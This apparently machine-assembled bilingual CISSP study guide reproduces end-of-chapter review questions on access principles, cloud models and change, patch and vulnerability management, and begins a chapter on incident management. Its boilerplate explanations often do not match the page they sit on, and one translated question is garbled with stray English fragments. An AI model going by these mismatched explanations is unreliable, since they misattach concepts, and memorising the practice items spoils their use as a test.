When an organization does not have an effective patch management program, it will often experience outages and incidents from known issues that could have been prevented. Explain vulnerability management. Vulnerability management includes routine vulnerability scans and periodic vulnerability assessments. Vulnerability scanners can detect known security vulnerabilities and weaknesses such as the absence of patches or weak passwords. They generate reports that indicate the technical vulnerabilities of a system and are an effective check for a patch management program. Vulnerability assessments extend beyond just technical scans and can include reviews and audits to detect vulnerabilities.

Written Lab 1. Define the difference between need-to-know and the least privilege principle.

中文直译 / 整理

基服务时,您必须明确谁负责维护和安全。 在IaaS模型中,云服务提供商提供 的维护和安全最少。 解释配置和变更控制管理。 通过有效的配置和变更管理计划,可以预防许多中断 和事件。 配置管理(CM)确保系统配置一致,并且系统配置已知且已记录。 基 线化确保系统以共同的基线或起点进行部署,镜像是常见的基线化方法。 变更管 理有助于减少因未经授权的更改导致的中断或安全减弱。 一个CM流程要求更改 必须被请求、审查、批准、测试、安排、实施并记录。 版本控制使用标签或编号 系统来跟踪软件更新版本中的更改。 理解补丁管理。 补丁管理确保系统保持最新补丁。 您应了解,有效的补丁管理计 划将评估、测试、批准和部署补丁。 此外,应注意系统审计会验证已批准补丁在 系统中的部署情况。 补丁管理通常与变更管理和配置管理交织在一起,以确保文 档反映这些更改。 当组织没有有效的补丁管理计划时,通常会因已知问题而经历 本可预防的中断和事件。 解释漏洞管理。 漏洞管理包括常规的漏洞扫描和定期的漏洞评估。 漏洞扫描器可 以检测已知的安全漏洞和弱点,例如缺少补丁或弱密码。 它们生成报告,指出系 统的技术性漏洞,是补丁管理程序的有效检查手段。

漏洞评估不仅限于技术扫描, 还可包括审查和审计以发现漏洞。 书面实验 1. 定义“必需知道”原则与最小权限原则之间的区别。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 45 / PDF P1131

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

2. Describe the purpose of monitoring the assignment and usage of special privileges. 3. List the three primary cloud-based service models and identify the level of maintenance provided by the cloud service provider in each of the models. 4. Explain how change management processes help prevent outages. Review Questions 1. Which security principle involves the knowledge and possession of sensitive material as an aspect of one's occupation? A. Principle of least privilege B. Segregation of duties C. Need-to-know D. As-needed basis 2. An organization ensures that users are granted access to only the data they need to perform specific work tasks. What principle are they following? A.

Principle of least permission B. Segregation of duties (SoD) C. Need-to-know D. Job rotation 3. What concept is used to grant users only the rights and permissions they need to complete their job responsibilities? A. Need-to-know B. Mandatory vacations C. Least privilege principle D. Service-level agreement (SLA) 4. A large organization using a Microsoft domain wants to limit the amount of time users have elevated privileges. Which of the following security operation concepts can be used to support this goal? 2.

中文直译 / 整理

描述监控特殊权限分配和使用的目的。 3. 列出三种主要的云服务模型,并指出在每种模型中云服务提供商提供的 维护级别。 4. 解释变更管理流程如何帮助防止中断。 复习问题 1. 哪种安全原则涉及将敏感信息的知识和拥有作为职业的一部分? A. 最小权限原则 B. 职责分离 C. 需知原则 D. 按需原则 2. 组织确保用户仅被授予执行特定工作任务所需的数据访问权限。 他们遵 循的是什么原则? A. 最小权限原则 B. 职责分离(SoD) C. 需知原则 D. 岗位轮换 3. 哪种概念用于仅授予用户完成其工作职责所需的权限和许可? A. 需知原则 B. 强制休假 C. 最小权限原则 D. 服务级别协议(SLA) 4. 一个使用 Microsoft 域的大型组织希望限制用户拥有提升权限的时间。 以 下哪项安全运营概念可用于支持此目标?

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 46 / PDF P1132

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A. Principle of least permission B. Segregation of duties C. Need-to-know D. Privileged account management 5. An administrator is granting permissions to a database. What is the default level of access the administrator should grant to new users in the organization? A. Read B. Modify C. Full access D. No access 6. You want to apply the least privilege principle when creating new accounts in the software development department. Which of the following should you do? A. Create each account with only the rights and permissions needed by the employee to perform their job. B. Give each account full rights and permissions to the servers in the software development department. C.

Create each account with no rights and permissions. D. Add the accounts to the local Administrators group on the new employee's computer. 7. Your organization has divided a high-level auditing function into several individual job tasks. These tasks are divided between three administrators. None of the administrators can perform all of the tasks. What does this describe? A. Job rotation B. Mandatory vacation C. Segregation of duties D. Least privilege 8. A financial organization commonly has employees switch duty responsibilities every six months. What security principle are they A.

中文直译 / 整理

最小权限原则 B. 职责分离 C. 必须知道 D. 特权账户管理 5. 管理员正在为数据库授予权限。 管理员应为组织中的新用户授予的默认访 问级别是什么? A. 读取 B. 修改 C. 完全访问 D. 无访问 6. 在为软件开发部门创建新账户时,您希望应用最小权限原则。 您 应该执行以下哪项操作? A. 为每个账户仅授予员工履行其工作所需的权限和访问权。 B. 给每个账户授予软件开发部门服务器的全部权限和访问权。 C. 为每个账户创建时无任何权限。 D. 将这些账户添加到新员工计算机的本地管理员组中。 7. 您的组织已将高级审计功能划分为若干独立的工作任务,这些任务由三位 管理员分担,没有任何一位管理员能执行所有任务。 这描述的是什么? A. 职责轮换 B. 强制休假 C. 职责分离 D. 最小权限 8. 金融机构通常每六个月让员工轮换职责。 他们遵循的是哪项安全原则

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 47 / PDF P1133

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

employing? A. Job rotation B. Segregation of duties C. Mandatory vacations D. Least privilege 9. Which of the following is one of the primary reasons an organization enforces a mandatory vacation policy? A. To rotate job responsibilities B. To detect fraud C. To increase employee productivity D. To reduce employee stress levels 10. Your organization has contracted with a third-party provider to host cloud-based servers. Management wants to ensure there are monetary penalties if the third party doesn't meet their contractual responsibilities related to uptimes and downtimes. Which of the following is the best choice to meet this requirement? A. MOU B. ISA C. SLA D. SED 11.

Which one of the following is a cloud-based service model that gives an organization the most control and requires the organization to perform all maintenance on operating systems and applications? A. Infrastructure as a service (IaaS) B. Platform as a service (PaaS) C. Software as a service (SaaS) D. Public 12. Which one of the following is a cloud-based service model that allows users to access email via a web browser? A. Infrastructure as a service (IaaS)

中文直译 / 整理

使用? A. 工作轮换 B. 职责分离 C. 强制休假 D. 最小权限 9. 以下哪一项是组织实施强制休假政策的主要原因之一? A. 轮换工作职责 B. 检测欺诈行为 C. 提高员工生产力 D. 降低员工压力水平 10. 您的组织已与第三方提供商签订合同,由其托管云服务器。 管理层希望确 保如果第三方未能履行合同责任,将面临经济处罚 与正常运行时间和停机时间相关。 以下哪一项是满足此要求的最佳选择? A. MOU B. ISA C. SLA D. SED 11. 以下哪一项是一种云服务模型,为 org组织提供最大的控制和重 quires the or g组织执行 所有操作系统和应用程序的维护? A. 基础设施即服务(IaaS) B. 平台即服务(PaaS) C. 软件即服务(SaaS) D. 公共 12. 以下哪一项是基于云的服务模型,允许用户通过网页浏览器访问电子邮件? A. 基础设施即服务(IaaS)

小白解释

场景先行:你是公司的安全负责人,正在读第 1133 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
学习单元 48 / PDF P1134

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

B. Platform as a service (PaaS) C. Software as a service (SaaS) D. Public 13. The IT department routinely uses images when deploying new systems. Of the following choices, what is a primary benefit of using images? A. Provides baseline for configuration management B. Improves patch management response times C. Reduces vulnerabilities from unpatched systems D. Provides documentation for changes 14. A server administrator recently modified the configuration for a server to improve performance. Unfortunately, when an automated script runs once a week, the modification causes the server to reboot.

It took several hours of troubleshooting to ultimately determine the problem wasn't with the script but instead with the modification. What could have prevented this? A. Vulnerability management B. Patch management C. Change management D. Blocking all scripts 15. Which of the following steps would be included in a change management process? (Choose three.) A. Immediately implement the change if it will improve performance. B. Request the change. C. Create a rollback plan for the change. D. Document the change. 16. A new CIO learned that an organization doesn't have a change management program. She insists one be implemented immediately.

Of the following choices, what is a primary goal of a change management program? A. Personnel safety B. Allowing rollback of changes B.

中文直译 / 整理

平台即服务(PaaS) C. 软件即服务(SaaS) D. 公共 13. IT 部门在部署新系统时经常使用镜像。 以下选项中,使用镜像的主要优势是 什么? A. 为配置管理提供基准 B. 提高补丁管理的响应速度 C. 减少未打补丁系统带来的漏洞 D. 提供变更的文档 14. 一名服务器管理员最近修改了服务器的配置以提升性能。 不幸的是,当一 个自动化脚本每周运行一次时,该修改导致服务器重启。 经过数小时的故障排 除,最终确定问题并非出在脚本上,而是源于该修改。 如何才能防止这种情况 发生? A. 漏洞管理 B. 补丁管理 C. 变更管理 D. 阻止所有脚本 15. 以下哪些步骤会包含在变更管理流程中? (选择三个。 ) A. 如果变更能提高性能,则立即实施。 B. 提出变更请求。 C. 为变更制定回滚计划。 D. 记录变更。 16. 一位新的首席信息官了解到,该组织没有变更管理计划。 她坚持立即实 施一个。 以下选项中,变更管理计划的主要目标是什么? A. 人员安全 B. 允许回滚更改

小白解释

场景先行:你是公司的安全负责人,正在读第 1134 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 49 / PDF P1135

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

C. Ensuring that changes do not reduce security D. Auditing privilege access 17. Systems within an organization are configured to receive and apply patches automatically. After receiving a patch, 55 of the systems automatically restarted and booted into a stop error. What could have prevented this problem without sacrificing security? A. Disable the setting to apply the patches automatically. B. Implement a patch management program to approve all patches. C. Ensure systems are routinely audited for patches. D. Implement a patch management program that tests patches before deploying them. 18. A security administrator wants to verify the existing systems are up-todate with current patches.

Of the following choices, what is the best method to ensure systems have required patches? A. Patch management system B. Patch scanner C. Penetration tester D. Fuzz tester 19. A recent attack on servers within your organization caused an excessive outage. You need to check systems for known issues that attackers may use to exploit other systems in your network. Which of the following is the best choice to meet this need? A. Versioning tracker B. Vulnerability scanner C. Security audit D. Security review 20. Which one of the following processes is most likely to list all known security risks within a system? A. Configuration management B. Patch management C. Hardware inventory C.

中文直译 / 整理

确保变更不会降低安全性 D. 审计特权访问 17. 组织内的系统配置为自动接收和应用补丁。 接收补丁后,有55个系统 自动重启并进入停止错误。 在不牺牲安全性的前提下,如何预防此问题? A. 禁用自动应用补丁的设置。 B. 实施补丁管理程序以批准所有补丁。 C. 定期审计系统以检查补丁情况。 D. 实施在部署前测试补丁的补丁管理程序。 18. 安全管理员希望验证现有系统是否已更新至最新补丁。 在以下选项中, 最佳方法是什么,以确保系统拥有所需的补丁? A. 补丁管理系统 B. 补丁扫描器 C. 渗透测试人员 D. 模糊测试器 19. 最近针对您组织内服务器的攻击导致了严重的停机。 您需要检查系统是 否存在攻击者可能利用来入侵您网络中其他系统的已知漏洞。 以下哪一项是 满足此需求的最佳选择? A. 版本追踪器 B. 漏洞扫描器 C. 安全审计 D. 安全审查 20. 以下哪个过程最有可能列出系统内所有已知的安全风险? A. 配置管理 B. 补丁管理 C. 硬件清单

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 50 / PDF P1136

第 1136 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

D. Vulnerability scan D.

中文直译 / 整理

漏洞扫描

小白解释

场景先行:你是公司的安全负责人,正在读第 1136 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1136 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
漏洞扫描 漏洞扫描用工具找已知弱点。
第 17 章 · P1138-1215 · 78 个学习单元

预防和响应事件

OSG10 · Chapter 17 · Preventing and Responding to Incidents · 全文覆盖 + 小白精读 + 画报

第 17 章:预防和响应事件

这不是提炼版。本页按 PDF 第 1138-1215 页连续覆盖第 17 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

78个连续学习单元
4格原文 / 直译 / 解释 / 考点
78页覆盖第17章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P1138

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 7.0: Security Operations 7.2 Conduct logging and monitoring activities 7.2.1 Intrusion detection and prevention system (IDPS) 7.2.2 Security information and event management (SIEM) 7.2.3 Continuous monitoring and tuning 7.2.4 Egress monitoring 7.2.5 Log management 7.2.6 Threat intelligence (e.g., threat feeds, threat hunting) 7.6 Conduct incident management 7.6.1 Detection 7.6.2 Response 7.6.3 Mitigation 7.6.4 Reporting 7.6.5 Recovery 7.6.6 Remediation 7.6.7 Lessons learned 7.7 Operate and maintain detection and preventative measures 7.7.2 Intrusion detection systems (IDS) and intrusion prevention systems (IPS) 7.7.3 Whitelisting/blacklisting 7.7.4 Third-party provided security services 7.7.5 Sandboxing 7.7.6 Honeypots/honeynets 7.7.7 Anti-malware 7.7.8 Machine learning and artificial intelligence (AI) based tools

中文直译 / 整理

本章涵盖的CISSP主题包括: 第7.0域:安全运营 7.2 执行日志记录和监控活动 7.2.1 入侵检测和防御系统(IDPS) 7.2.2 安全信息和事件管理(SIEM) 7.2.3 持续监控与调优 7.2.4 出站监控 7.2.5 日志管理 7.2.6 威胁情报(例如,威胁情报源、威胁狩猎) 7.6 实施事件管理 7.6.1 检测 7.6.2 响应 7.6.3 缓解措施 7.6.4 报告 7.6.5 恢复 7.6.6 修复 7.6.7 经验教训 7.7 运行和维护检测与预防措施 7.7.2 入侵检测系统(IDS)和入侵防御系统(IPS) 7.7.3 白名单/黑名单 7.7.4 第三方提供的安全服务 7.7.5 沙箱 7.7.6 蜜罐/蜜网 7.7.7 反恶意软件 7.7.8 基于机器学习和人工智能(AI)的工具

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

威胁狩猎:威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Threat modeling 偏预防设计,threat hunting 偏主动发现已存在威胁。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 02 / PDF P1139

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

The Security Operations domain for the CISSP certification exam includes several objectives directly related to incident management. Effective incident management helps an organization respond when attacks occur to limit the scope of an attack. Organizations implement preventive measures to protect against and detect attacks, and this chapter covers many of these controls and countermeasures. Logging and monitoring provide assurances that security controls are in place and provide the desired protection. Conducting Incident Management One of the primary goals of any security program is to prevent security incidents.

However, despite the best efforts of IT and security professionals, incidents occur. When they do, an organization must be able to respond to limit or contain the incident. The primary goal of incident management is to minimize the impact on the organization. Defining an Incident Before digging into incident management, it's important to understand the definition of an incident. Although that may seem simple, you'll find that different sources have slightly different definitions. In general, an incident is any event that has a negative effect on the confidentiality, integrity, or availability of an organization's assets.

Notice that this definition encompasses events as diverse as direct attacks, natural occurrences such as a hurricane or earthquake, and even accidents, such as someone unintentionally cutting cables for a live network. In contrast, a computer security incident (sometimes called just a security incident) commonly refers to an incident that is the result of an attack or the result of malicious, intentional, or accidental actions on the part of users.

For example, request for comments (RFC) 2350, Expectations for Computer Security Incident Response, defines both a security incident and a computer security incident as “any adverse event which compromises some aspect of computer or network security.” NIST SP 800-61—Computer Security Incident Handling Guide, defines a computer security incident as “a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices.” CISSP

中文直译 / 整理

认证考试的安全运营领域包含多个与事件管理直接相关的目标。 有效的 事件管理有助于组织在攻击发生时作出响应,以限制攻击的范围。 组织会实施 预防措施来保护和检测攻击,本章将介绍许多此类控制措施和应对方法。 日志 记录和监控可确保安全控制措施已到位并提供所需的保护。 实施事件管理 任何安全计划的主要目标之一是防止安全事件。 然而,尽管IT和安全专业人 员尽了最大努力,事件仍会发生。 一旦发生,组织必须能够作出响应,以限制 或控制事件。 事件管理的主要目标是将对组织的影响降至最低。 定义事件 在深入探讨事件管理之前,理解事件的定义非常重要。 尽管这看似简单,但 你会发现不同来源对事件的定义略有不同。 一般来说,事件是指对组织资产的机密性、完整性或可用性产生负面影响的 任何事件。 请注意,此定义涵盖了多种事件,包括直接攻击、自然灾害(如 飓风或地震),甚至意外事件(例如有人无意中切断了正在运行的网络电缆)。 相比之下,计算机安全事件(有时简称为安全事件)通常指由攻击或用户恶意、 故意或无意行为导致的事件。

例如,请求评论(RFC)2350《计算机安全事件 响应的期望》将安全事件和计算机安全事件均定义为“任何损害计算机或网络 安全某一方面的不利事件”。 NISTSP800-61—计算机安全事件处理指南将计算机安全事件定义为“违反 或即将违反计算机安全政策、可接受使用政策或标准安全实践的行为”。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
学习单元 03 / PDF P1140

